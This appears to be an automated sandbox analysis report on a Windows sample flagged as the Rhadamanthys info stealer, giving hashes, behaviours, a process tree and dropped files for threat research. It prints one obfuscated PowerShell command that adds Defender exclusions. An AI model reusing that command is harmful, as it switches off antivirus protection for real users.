Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
29/03/2024, 10:48
Static task
static1
Behavioral task
behavioral1
Sample
BACONWARE V3.0.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
BACONWARE V3.0.exe
Resource
win10v2004-20240226-en
General
-
Target
BACONWARE V3.0.exe
-
Size
4.8MB
-
MD5
f3b1dd838a59c419431c5aa86c1a4feb
-
SHA1
85ac1eb8a03bedcfbc3d44cedeb802f5cae2ea0a
-
SHA256
fad83422bd338909393c57663ab1bcafb94ec684f74fdb95aaad925e82567fa3
-
SHA512
dbaac6b3c531cd84eac6a9440534d18cbc599826357b1efe36cdd16be163bd68c6ddd4d3211efca0d5e8c2ca6868cfb0fb3c3e0584c515b89e1ab1cac8ef6889
-
SSDEEP
98304:1vW7Ru1fkpfVmr/V9JfzD+p05u9qgo67Smy9BHbCMMjgml7/lg+QXcAz:JibHmTJfzAyQRoRmA1H8eFsA
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2884 created 1188 2884 svchost.exe 21 -
Executes dropped EXE 3 IoCs
pid Process 2884 svchost.exe 2560 explorer.exe 2072 explorer.exe -
Loads dropped DLL 5 IoCs
pid Process 1540 BACONWARE V3.0.exe 1540 BACONWARE V3.0.exe 1540 BACONWARE V3.0.exe 2560 explorer.exe 2072 explorer.exe -
resource yara_rule behavioral1/files/0x000500000001874c-33.dat upx behavioral1/memory/2072-37-0x000007FEF6090000-0x000007FEF64F6000-memory.dmp upx -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0010000000014dae-13.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1664 powershell.exe 2884 svchost.exe 2884 svchost.exe 2396 dialer.exe 2396 dialer.exe 2396 dialer.exe 2396 dialer.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1664 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 1540 wrote to memory of 1664 1540 BACONWARE V3.0.exe 28 PID 1540 wrote to memory of 1664 1540 BACONWARE V3.0.exe 28 PID 1540 wrote to memory of 1664 1540 BACONWARE V3.0.exe 28 PID 1540 wrote to memory of 1664 1540 BACONWARE V3.0.exe 28 PID 1540 wrote to memory of 2884 1540 BACONWARE V3.0.exe 30 PID 1540 wrote to memory of 2884 1540 BACONWARE V3.0.exe 30 PID 1540 wrote to memory of 2884 1540 BACONWARE V3.0.exe 30 PID 1540 wrote to memory of 2884 1540 BACONWARE V3.0.exe 30 PID 1540 wrote to memory of 2560 1540 BACONWARE V3.0.exe 31 PID 1540 wrote to memory of 2560 1540 BACONWARE V3.0.exe 31 PID 1540 wrote to memory of 2560 1540 BACONWARE V3.0.exe 31 PID 1540 wrote to memory of 2560 1540 BACONWARE V3.0.exe 31 PID 2560 wrote to memory of 2072 2560 explorer.exe 32 PID 2560 wrote to memory of 2072 2560 explorer.exe 32 PID 2560 wrote to memory of 2072 2560 explorer.exe 32 PID 2884 wrote to memory of 2396 2884 svchost.exe 33 PID 2884 wrote to memory of 2396 2884 svchost.exe 33 PID 2884 wrote to memory of 2396 2884 svchost.exe 33 PID 2884 wrote to memory of 2396 2884 svchost.exe 33 PID 2884 wrote to memory of 2396 2884 svchost.exe 33 PID 2884 wrote to memory of 2396 2884 svchost.exe 33
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1188
-
C:\Users\Admin\AppData\Local\Temp\BACONWARE V3.0.exe"C:\Users\Admin\AppData\Local\Temp\BACONWARE V3.0.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAegBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AegB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAeQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwByACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2884
-
-
C:\Users\Admin\AppData\Local\explorer.exe"C:\Users\Admin\AppData\Local\explorer.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Users\Admin\AppData\Local\explorer.exe"C:\Users\Admin\AppData\Local\explorer.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2072
-
-
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2396
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵PID:2420
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD53f782cf7874b03c1d20ed90d370f4329
SHA108a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA2562a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857
-
Filesize
4.4MB
MD5ce453607540a4b0e0c88476042d31791
SHA19fe09b42424e044a7c11aea2f214a3d86de8f5a1
SHA2569a10c5b653feff9be0898a0ae18f7479e36275896bd4482f1fec237cf9ce619c
SHA512f0fdcd4e5fdbc03d4a3bb1eee4b69c6bf2585a609f9fc56739e9320d1072a7935ce126e7dc737ad1592f64023c3a17d0e0dd659a5d3a4ee940ca2301e81912ee
-
Filesize
355KB
MD52ef91bf37b3da8cad6751b665bd4e6af
SHA15c15bbc721f91855388861d378cf9d26a140cead
SHA2565263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA51216f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3